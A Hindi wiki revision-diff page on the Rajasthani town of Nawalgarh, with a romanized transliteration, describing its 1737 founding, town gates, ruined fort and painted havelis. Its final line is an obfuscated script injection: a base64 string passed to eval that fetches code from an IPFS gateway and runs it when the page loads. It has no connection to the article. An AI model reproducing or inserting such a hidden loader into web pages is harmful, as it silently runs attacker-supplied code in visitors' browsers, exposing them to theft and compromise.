Difference between revisions of "नवलगढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "बाजार" to "बाज़ार")
Line 4: Line 4:
 
नवलगढ़ की स्थापना ठाकुर नवल सिंह बहादुर ने 1737 ई. में की थी। मारवाड़ी समुदाय के कई महान व्यापारिक परिवार नवलगढ़ मूल के हैं। नवलगढ़ उच्च दीवारों और अलग-अलग दिशाओं में चार फाटकों, अगूना दरवाजा, बावड़ी दरवाजा, मंडी दरवाजा और नानसा दरवाजा से मिलकर सुसज्जित घेरे में सुरक्षित किया गया था।
 
नवलगढ़ की स्थापना ठाकुर नवल सिंह बहादुर ने 1737 ई. में की थी। मारवाड़ी समुदाय के कई महान व्यापारिक परिवार नवलगढ़ मूल के हैं। नवलगढ़ उच्च दीवारों और अलग-अलग दिशाओं में चार फाटकों, अगूना दरवाजा, बावड़ी दरवाजा, मंडी दरवाजा और नानसा दरवाजा से मिलकर सुसज्जित घेरे में सुरक्षित किया गया था।
 
==पर्यटन स्थल==
 
==पर्यटन स्थल==
रंग-बिरंगा बाजार तथा अनगिनत हवेलियाँ और महीन [[वास्तुकला]] के साथ यहाँ का विशाल क़िला इस जगह को रोचक दर्शन स्थल बनाते हैं। यहाँ कुछ मुख्य हवेलियाँ हैं, जैसे- आनंदीलाल पोद्दार हवेली, आठ हवेली, होड़ राज पटोदिया हवेली, जहाँ पर्यटक जा सकते हैं। यहाँ पर दो क़िले भी हैं। महल का होटल रुप निवास एक सुंदर विरासत संपत्ति है और यहाँ आधुनिक सुविधायें उपलब्ध हैं। इस महल में विशाल रंगीन कमरें, आरामदेह व्यवस्था, अदब के साथ आतिथ्य तथा संकल्पना पर आधारित शाम का मनोरंजन और साथ में भोजन भी उपलब्ध है।
+
रंग-बिरंगा बाज़ार तथा अनगिनत हवेलियाँ और महीन [[वास्तुकला]] के साथ यहाँ का विशाल क़िला इस जगह को रोचक दर्शन स्थल बनाते हैं। यहाँ कुछ मुख्य हवेलियाँ हैं, जैसे- आनंदीलाल पोद्दार हवेली, आठ हवेली, होड़ राज पटोदिया हवेली, जहाँ पर्यटक जा सकते हैं। यहाँ पर दो क़िले भी हैं। महल का होटल रुप निवास एक सुंदर विरासत संपत्ति है और यहाँ आधुनिक सुविधायें उपलब्ध हैं। इस महल में विशाल रंगीन कमरें, आरामदेह व्यवस्था, अदब के साथ आतिथ्य तथा संकल्पना पर आधारित शाम का मनोरंजन और साथ में भोजन भी उपलब्ध है।
 
====क़िला====
 
====क़िला====
नवलगढ़ का क़िला वर्ष 1737 में स्थापित किया गया था। यह अब काफ़ी हद तक खंड़हर बन चुका है। अग्नेय दिशा में केवल एक ही कमरें में सुंदर मीनाकारी तथा पुराने [[जयपुर]] तथा नवलगढ़ के चित्र हैं। यहाँ जाने के लिये एक मिठाई की दुकान से होकर गुजरना होता है, जिसके लिए शुल्क देना पड़ता है। इस [[क़िला|क़िले]] का बाकी हिस्सा एक बहुत बड़ा [[फल]] तथा [[सब्जियाँ|सब्जियों]] का बाजार और दो बैंक इस्तेमाल करती हैं।
+
नवलगढ़ का क़िला वर्ष 1737 में स्थापित किया गया था। यह अब काफ़ी हद तक खंड़हर बन चुका है। अग्नेय दिशा में केवल एक ही कमरें में सुंदर मीनाकारी तथा पुराने [[जयपुर]] तथा नवलगढ़ के चित्र हैं। यहाँ जाने के लिये एक मिठाई की दुकान से होकर गुजरना होता है, जिसके लिए शुल्क देना पड़ता है। इस [[क़िला|क़िले]] का बाकी हिस्सा एक बहुत बड़ा [[फल]] तथा [[सब्जियाँ|सब्जियों]] का बाज़ार और दो बैंक इस्तेमाल करती हैं।
 
====हवेलियाँ====
 
====हवेलियाँ====
 
नवलगढ़ क़िले के पश्चिम में हवेलियों का एक समूह है, जिसे 'आठ हवेलियाँ' कहते हैं। इन हवेलियों पर बनी नक्काशी आधुनिकता के साथ मेल खाती है। एक चित्र में भाप का इंजन है तो अन्य में बड़े [[हाथी]], घोड़े तथा ऊँट की प्रतिमायें हैं। इन हवेलियों के सामने है मोरारका हवेली, जिसमें कुछ बहुत ही सुंदर चित्र हैं। इसमें भगवान [[श्रीकृष्ण]] से जुड़ी कथाओं पर आधारित सूक्ष्म चित्र भी हैं। इस हवेली में कोई नहीं रहता तथा उसका आंगन हमेशा बंद रहता है। महत्वपूर्ण कार्यक्रम के समय इसे खोला जाता है। उत्तर दिशा में है हेमराज कुलवाल हवेली, जो [[1931]] में बनवाई गई थी। इस हवेली के द्वार पर [[गांधीजी]] तथा [[जवाहरलाल नेहरू]] के साथ कुलवाल परिवार के सदस्यों के चित्र हैं। अन्य देखने लायक हवेलियों हैं-
 
नवलगढ़ क़िले के पश्चिम में हवेलियों का एक समूह है, जिसे 'आठ हवेलियाँ' कहते हैं। इन हवेलियों पर बनी नक्काशी आधुनिकता के साथ मेल खाती है। एक चित्र में भाप का इंजन है तो अन्य में बड़े [[हाथी]], घोड़े तथा ऊँट की प्रतिमायें हैं। इन हवेलियों के सामने है मोरारका हवेली, जिसमें कुछ बहुत ही सुंदर चित्र हैं। इसमें भगवान [[श्रीकृष्ण]] से जुड़ी कथाओं पर आधारित सूक्ष्म चित्र भी हैं। इस हवेली में कोई नहीं रहता तथा उसका आंगन हमेशा बंद रहता है। महत्वपूर्ण कार्यक्रम के समय इसे खोला जाता है। उत्तर दिशा में है हेमराज कुलवाल हवेली, जो [[1931]] में बनवाई गई थी। इस हवेली के द्वार पर [[गांधीजी]] तथा [[जवाहरलाल नेहरू]] के साथ कुलवाल परिवार के सदस्यों के चित्र हैं। अन्य देखने लायक हवेलियों हैं-

Revision as of 10:16, 14 May 2013

navalagadh jhuanjhunoo zila, rajasthan ki tahasil hai. yah mukundagadh ke uttar mean pandrah kilomitar aur dundalod se das kilomitar door sthit hai. 18vian shatabdi mean sthapit is gadh mean shekhavati pradesh ki kuchh atyant suandar kalakritiyaan maujood haian.

itihas

navalagadh ki sthapana thakur naval sianh bahadur ne 1737 ee. mean ki thi. marava di samuday ke kee mahan vyaparik parivar navalagadh mool ke haian. navalagadh uchch divaroan aur alag-alag dishaoan mean char phatakoan, agoona daravaja, bav di daravaja, mandi daravaja aur nanasa daravaja se milakar susajjit ghere mean surakshit kiya gaya tha.

paryatan sthal

rang-biranga bazar tatha anaginat haveliyaan aur mahin vastukala ke sath yahaan ka vishal qila is jagah ko rochak darshan sthal banate haian. yahaan kuchh mukhy haveliyaan haian, jaise- anandilal poddar haveli, ath haveli, ho d raj patodiya haveli, jahaan paryatak ja sakate haian. yahaan par do qile bhi haian. mahal ka hotal rup nivas ek suandar virasat sanpatti hai aur yahaan adhunik suvidhayean upalabdh haian. is mahal mean vishal rangin kamarean, aramadeh vyavastha, adab ke sath atithy tatha sankalpana par adharit sham ka manoranjan aur sath mean bhojan bhi upalabdh hai.

qila

navalagadh ka qila varsh 1737 mean sthapit kiya gaya tha. yah ab kafi had tak khan dahar ban chuka hai. agney disha mean keval ek hi kamarean mean suandar minakari tatha purane jayapur tatha navalagadh ke chitr haian. yahaan jane ke liye ek mithaee ki dukan se hokar gujarana hota hai, jisake lie shulk dena p data hai. is qile ka baki hissa ek bahut b da phal tatha sabjiyoan ka bazar aur do baiank istemal karati haian.

haveliyaan

navalagadh qile ke pashchim mean haveliyoan ka ek samooh hai, jise 'ath haveliyaan' kahate haian. in haveliyoan par bani nakkashi adhunikata ke sath mel khati hai. ek chitr mean bhap ka ianjan hai to any mean b de hathi, gho de tatha ooant ki pratimayean haian. in haveliyoan ke samane hai moraraka haveli, jisamean kuchh bahut hi suandar chitr haian. isamean bhagavan shrikrishna se ju di kathaoan par adharit sookshm chitr bhi haian. is haveli mean koee nahian rahata tatha usaka aangan hamesha band rahata hai. mahatvapoorn karyakram ke samay ise khola jata hai. uttar disha mean hai hemaraj kulaval haveli, jo 1931 mean banavaee gee thi. is haveli ke dvar par gaandhiji tatha javaharalal neharoo ke sath kulaval parivar ke sadasyoan ke chitr haian. any dekhane layak haveliyoan haian-

  • bhagatoan ki chhoti haveli
  • parashuramapuriya haveli
  • dharani dhakara haveli
  • chauchhariya haveli
  • hira lal saravagi haveli
  • givarajaka haveli

d aau. ramanath poddar haveli sangrahalay, in sabhi mean bhitti chitroan ki dekhabhal ki jati hai tatha naye chitr shamil hote rahate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>